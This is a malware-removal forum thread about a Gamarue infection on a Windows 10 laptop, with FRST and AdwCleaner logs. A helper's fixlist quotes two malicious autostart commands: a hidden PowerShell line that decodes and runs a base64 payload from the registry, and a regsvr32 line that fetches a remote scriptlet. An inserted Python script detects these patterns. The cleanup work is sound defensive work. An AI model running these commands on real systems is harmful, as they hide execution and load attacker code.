19:04:24.848 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system. 
Date: 2017-06-28 19:04:24.794 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system. Date: 2017-06-18 19:26:08.764 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-06-13 08:51:15.282 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-5500U CPU @ 2.40GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16079.95 MB Verfügbarer physikalischer RAM: 12948.66 MB Summe virtueller Speicher: 32463.95 MB Verfügbarer virtueller Speicher: 29381.89 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:236.7 GB) (Free:91.35 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 5346E13D) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=236.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=889 MB) - (Type=27) ==================== Ende von Addition.txt ============================ |
05.07.2017, 14:56 | #14 |
/// TB-Senior | Windows 10 - Gamarue Step 1: Removal with FRST Please press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document. Code:
closeprocesses:
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [{C2956868-62F6-438A-A9BC-12CB233D69BF}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\BPMJBABA').nhnPLmKgFtez)));
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.39slxu3bw.ru/deploy.xml scrobj.dll
emptytemp:
Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
Step 2: AdwCleaner Please download AdwCleaner to your desktop.
Step 3: MBAM Please download Malwarebytes Anti-Malware.
Step 4: New FRST logs
__________________ For protection against female Trojans and femaleware, the Windows Defenderess is sufficient on an up-to-date Windows 10. |
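The two Run values in the fixlist above start script hosts (powershell.exe, regsvr32 with scrobj.dll) instead of a file on disk. As an added example (not part of the thread and not FRST's own logic), the following Python code triages FRST Run lines for those two patterns; the rule labels and function names are assumptions, and the two flagged sample lines are constructed with a placeholder SID, key name, value name and URL.

```python
import re
from dataclasses import dataclass, field

# Shape of an FRST "Run" line: HIVE[\SID]\...\Run: [ValueName] => command
RUN_LINE = re.compile(
    r"^(?P<hive>HK[A-Z]+(?:-x32)?(?:\\S-[\d-]+)?)\\\.\.\.\\(?P<key>Run(?:Once)?): "
    r"\[(?P<name>.+?)\] => (?P<cmd>.+)$"
)
# FRST appends "[size date] (vendor)" when the target resolves to a file on disk.
FILE_META = re.compile(r"\[\d+ \d{4}-\d{2}-\d{2}\] \(.*\)\s*$")

# Indicators for a PowerShell autostart that rebuilds its payload at logon.
POWERSHELL_RULES = [
    ("hidden window", re.compile(r"-w(?:in(?:dowstyle)?)?\s+hidden", re.I)),
    ("execution policy bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("dynamic evaluation (iex)", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("base64-decoded payload", re.compile(r"frombase64string", re.I)),
    ("payload read from registry",
     re.compile(r"\b(?:gp|get-itemproperty)\s+'?HK(?:CU|LM):", re.I)),
]
# regsvr32 given a URL (plain or defanged) as the /i: argument.
REGSVR32_REMOTE = re.compile(r"/i:(?:https?|hxxps?)://\S+", re.I)


@dataclass
class Finding:
    hive: str
    name: str
    command: str
    reasons: list = field(default_factory=list)


def triage_run_entries(log_text):
    """Return a Finding for every Run/RunOnce line that matches a rule."""
    findings = []
    for raw in log_text.splitlines():
        m = RUN_LINE.match(raw.strip())
        if not m:
            continue  # not a Run entry (policies, services, tasks, ...)
        cmd = m["cmd"]
        reasons = []
        if re.search(r"\bpowershell(?:\.exe)?\b", cmd, re.I):
            reasons += [label for label, rx in POWERSHELL_RULES if rx.search(cmd)]
        if re.search(r"\bregsvr32(?:\.exe)?\b", cmd, re.I):
            if re.search(r"\bscrobj\.dll\b", cmd, re.I):
                reasons.append("regsvr32 driving scrobj.dll (scriptlet host)")
            if REGSVR32_REMOTE.search(cmd):
                reasons.append("scriptlet location is a URL")
        # Supporting signal only: FRST could not attach file metadata.
        if reasons and not FILE_META.search(cmd):
            reasons.append("no on-disk file metadata in the entry")
        if reasons:
            findings.append(Finding(m["hive"], m["name"], cmd, reasons))
    return findings


# First two lines: benign entries as they appear in the FRST log in this thread.
# Last three lines: constructed, with placeholder identifiers.
SAMPLE_LOG = r"""
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.)
HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\...\Run: [{00000000-0000-0000-0000-000000000000}] => powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\EXAMPLEKEY').ExampleValue)));
HKU\S-1-5-21-1111111111-2222222222-3333333333-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://placeholder.invalid/example.xml scrobj.dll
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
"""

if __name__ == "__main__":
    for f in triage_run_entries(SAMPLE_LOG):
        print(f"{f.hive} [{f.name}]")
        for reason in f.reasons:
            print(f"    - {reason}")
```

A PowerShell hit that also reports "payload read from registry" means the referenced key has to be reviewed as well, since removing the Run value alone leaves the stored payload behind.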
05.07.2017, 20:35 | #15 | ||
| Windows 10 - Gamarue Step 1: Quote:
AdwCleaner Logfile: Code:
# AdwCleaner v6.047 - Bericht erstellt am 05/07/2017 um 21:24:36
# Aktualisiert am 19/05/2017 von Malwarebytes
# Datenbank : 2017-05-19.1 [Lokal]
# Betriebssystem : Windows 10 Pro (X64)
# Benutzername : ararat - ARARAT-NOTEBOOK
# Gestartet von : C:\Users\ararat\Desktop\AdwCleaner_6.047.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support
***** [ Dienste ] *****
[-] Dienst gelöscht: SSSvc
***** [ Ordner ] *****
[-] Ordner gelöscht: C:\Users\ararat\AppData\Local\PackageAware
***** [ Dateien ] *****
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
***** [ Registrierungsdatenbank ] *****
***** [ Browser ] *****
*************************
:: "Tracing" Schlüssel gelöscht
:: Winsock Einstellungen zurückgesetzt
:: "Image File Execution Options" Schlüssel gelöscht
:: "Prefetch" Dateien gelöscht
:: Proxy Einstellungen zurückgesetzt
:: TCP/IP Einstellungen zurückgesetzt
:: Firewall Einstellungen zurückgesetzt
:: Internet Explorer Richtlinien gelöscht
:: Chrome Richtlinien gelöscht
:: Hosts-Datei wiederhergestellt
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [1233 Bytes] - [05/07/2017 21:24:36]
C:\AdwCleaner\AdwCleaner[S0].txt - [1356 Bytes] - [05/07/2017 21:24:15]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [1379 Bytes] ##########
Step 3: Quote:
FRST Logfile: Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 03-07-2017 01 durchgeführt von ararat (Administrator) auf ARARAT-NOTEBOOK (05-07-2017 21:31:29) Gestartet von C:\Users\ararat\Desktop Geladene Profile: ararat (Verfügbare Profile: ararat & DefaultAppPool) Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 11 (Standard-Browser: "C:\Program Files\SRWare Iron (64-Bit)\chrome.exe" -- "%1") Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (Lenovo.) C:\Windows\System32\ibmpmsvc.exe (Lenovo.) C:\Windows\System32\LPlatSvc.exe () C:\Windows\System32\nvwmi64.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe (Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe (Intel Corporation) C:\Windows\System32\ibtsiva.exe (WIBU-SYSTEMS AG) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe (Autodesk Inc.) 
C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe (Lenovo Group Limited) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe (Lenovo Group Limited) C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe (Skype Technologies) C:\Program Files (x86)\Skype\Updater\Updater.exe (Microsoft Corporation) C:\Windows\System32\mqsvc.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated) C:\Windows\System32\valWBFPolicyService.exe (Synaptics Incorporated) C:\Windows\System32\valWbioSyncSvc.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe (Lenovo.) 
C:\Windows\System32\LPlatSvc.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynFP\Shared\SensorDBSynch.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tposd.exe (Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Synaptics) C:\Program Files\Synaptics\SynTP\SynLenovoHelper.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) 
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [1804432 2015-12-22] (NVIDIA Corporation) HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes) HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [3486520 2017-06-26] (Dropbox, Inc.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation) HKLM-x32\...\Run: [ADSKAppManager] => C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [477064 2013-12-22] (Autodesk Inc.) HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PrivacyIconClient.exe [1178912 2016-02-25] (Intel Corporation) HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 AppInit_DLLs: C:\Windows\system32\nvinitx.dll => Keine Datei Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CodeMeter Control Center.lnk [2016-02-23] ShortcutTarget: CodeMeter Control Center.lnk -> C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeterCC.exe (WIBU-SYSTEMS AG) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Netzwerk Server.lnk [2016-02-23] ShortcutTarget: Netzwerk Server.lnk -> C:\Program Files (x86)\WIBUKEY\Server\WkSvMgr.exe (WIBU-SYSTEMS AG) ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) 
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{870c603a-60f8-4e24-9690-e4821fe96d21}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{e862264f-fb30-45d1-a3f9-1bf499d21b67}: [DhcpNameServer] 192.168.2.1

Internet Explorer:
==================
HKU\S-1-5-21-3349751938-1204465652-1694021483-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.netflix.com/
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2016-02-23] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2016-02-23] (Oracle Corporation)

FireFox:
========
FF DefaultProfile: pnaz2so4.default
FF ProfilePath: C:\Users\ararat\AppData\Roaming\Mozilla\Firefox\Profiles\pnaz2so4.default [2017-07-05]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2016-02-23] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-11-05] (NVIDIA Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-02-23] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [49992 2017-06-26] (Dropbox, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [373744 2016-11-02] (Intel Corporation)
R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [57160 2017-06-05] (Lenovo Group Limited)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-19] (Intel(R) Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [209184 2016-02-25] (Intel Corporation)
R2 Lenovo Instant On; C:\Program Files\Lenovo\InstantOn\InstantOnSrv.exe [3124808 2017-04-28] (Lenovo Group Limited)
R2 LPlatSvc; C:\WINDOWS\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-06-02] (Lenovo)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S4 McNeelUpdate; C:\Program Files (x86)\McNeelUpdate\5.0\McNeelUpdateService.exe [68192 2013-12-07] (Robert McNeel & Associates)
S3 mi-raysat_3dsmax2015_64; C:\Program Files\Autodesk\3ds Max 2015\NVIDIA\Satellite\raysat_3dsmax2015_64server.exe [86016 2011-09-15] () [Datei ist nicht signiert]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2017-02-13] ()
R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [462968 2017-05-01] (NVIDIA Corporation)
R2 NVWMI; C:\Windows\system32\nvwmi64.exe [3180176 2015-12-22] ()
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [259176 2016-10-03] (Synaptics Incorporated)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [10351856 2016-12-15] (TeamViewer GmbH)
R2 valWBFPolicyService; C:\WINDOWS\system32\valWBFPolicyService.exe [86544 2016-07-13] (Synaptics Incorporated)
R2 valWbioSyncSvc; C:\WINDOWS\system32\valWbioSyncSvc.exe [56848 2016-07-13] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3743648 2017-02-13] (Intel® Corporation)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 blackberryncm; C:\WINDOWS\System32\drivers\blackberryncm6_AMD64.sys [36360 2016-04-06] (BlackBerry)
R3 e1dexpress; C:\WINDOWS\system32\DRIVERS\e1d62x64.sys [519680 2015-12-08] (Intel Corporation)
R3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [244744 2017-04-13] (Intel Corporation)
R0 IntelHSWPcc; C:\WINDOWS\System32\drivers\IntelPcc.sys [88256 2015-06-09] (Intel Corporation)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [253856 2017-07-05] (Malwarebytes)
S3 NETwNs64; C:\WINDOWS\System32\drivers\Netwsw02.sys [3422472 2015-12-25] (Intel Corporation)
R3 Netwtw04; C:\WINDOWS\system32\DRIVERS\Netwtw04.sys [7630072 2017-03-21] (Intel Corporation)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvltwu.inf_amd64_c8da725822079174\nvlddmkm.sys [14456920 2017-05-18] (NVIDIA Corporation)
R3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [423128 2013-07-24] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [51296 2016-10-03] (Synaptics Incorporated)
R1 SMIDriver; C:\WINDOWS\system32\DRIVERS\smi.sys [39488 2016-07-13] (Synaptics Incorporated)
R3 SPUVCbv; C:\WINDOWS\System32\Drivers\SPUVCbv64.sys [749640 2016-07-01] (Sunplus Innovation Technology Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R2 WIBUKEY; C:\WINDOWS\System32\DRIVERS\WibuKey64.sys [106760 2013-12-18] (WIBU-SYSTEMS AG)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-07-05 21:31 - 2017-07-05 21:31 - 00014389 _____ C:\Users\ararat\Desktop\FRST.txt
2017-07-05 21:31 - 2017-07-05 21:31 - 00001407 _____ C:\Users\ararat\Desktop\mbam.txt
2017-07-05 21:30 - 2017-07-05 21:30 - 00000000 ____H C:\ProgramData\cm-lock
2017-07-05 21:27 - 2017-07-05 21:30 - 00253856 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-07-05 21:27 - 2017-07-05 21:27 - 00001912 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-07-05 21:27 - 2017-07-05 21:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-07-05 21:27 - 2017-07-05 21:27 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-07-05 21:27 - 2017-07-05 21:27 - 00000000 ____D C:\Program Files\Malwarebytes
2017-07-05 21:27 - 2017-06-27 12:06 - 00077376 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-07-05 21:22 - 2017-07-05 21:24 - 00000000 ____D C:\AdwCleaner
2017-07-05 21:22 - 2017-07-05 21:17 - 04110280 _____ C:\Users\ararat\Desktop\AdwCleaner_6.047.exe
2017-07-05 21:19 - 2017-07-05 21:20 - 00001946 _____ C:\Users\ararat\Desktop\Fixlog.txt
2017-07-05 21:17 - 2017-07-05 21:18 - 65033984 _____ (Malwarebytes ) C:\Users\ararat\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.160-1.0.2251.exe
2017-07-05 21:17 - 2017-07-05 21:17 - 04110280 _____ C:\Users\ararat\Downloads\AdwCleaner_6.047.exe
2017-07-04 21:39 - 2017-07-04 21:39 - 00000000 ____D C:\Users\ararat\Desktop\FRST-OlderVersion
2017-07-04 21:35 - 2017-07-04 21:39 - 00283900 _____ C:\TDSSKiller.3.1.0.15_04.07.2017_21.35.13_log.txt
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Downloads\tdsskiller.exe
2017-07-04 21:34 - 2017-07-04 21:34 - 04922400 _____ (AO Kaspersky Lab) C:\Users\ararat\Desktop\tdsskiller.exe
2017-07-03 23:53 - 2017-07-03 23:56 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2017-07-02 23:17 - 2017-07-05 21:19 - 00000000 ____D C:\Users\ararat\Desktop\Troja
2017-07-02 20:58 - 2017-07-05 21:31 - 00000000 ____D C:\FRST
2017-07-02 20:45 - 2017-07-04 21:39 - 02436096 _____ (Farbar) C:\Users\ararat\Desktop\FRST64.exe
2017-07-02 20:37 - 2017-07-02 20:37 - 02435584 _____ (Farbar) C:\Users\ararat\Downloads\FRST64.exe
2017-06-29 23:31 - 2017-06-29 23:32 - 00000000 ____D C:\Users\ararat\Desktop\3D Druck
2017-06-27 22:23 - 2017-06-27 22:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-06-27 21:01 - 2017-06-27 21:01 - 00000000 ____D C:\Users\ararat\AppData\Local\DBG
2017-06-26 12:27 - 2017-06-26 12:27 - 00049992 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-06-26 12:27 - 2017-06-26 12:27 - 00045640 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2017-06-18 10:32 - 2017-06-18 10:32 - 02373944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WudfUpdate_01011.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-06-14 20:30 - 2017-06-03 12:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-06-14 20:30 - 2017-06-03 12:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-06-14 20:30 - 2017-06-03 12:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-06-14 20:30 - 2017-06-03 12:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-06-14 20:30 - 2017-06-03 12:10 - 00130464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2017-06-14 20:30 - 2017-06-03 12:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-06-14 20:30 - 2017-06-03 12:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-06-14 20:30 - 2017-06-03 12:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00923048 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-06-14 20:30 - 2017-06-03 12:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-06-14 20:30 - 2017-06-03 12:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
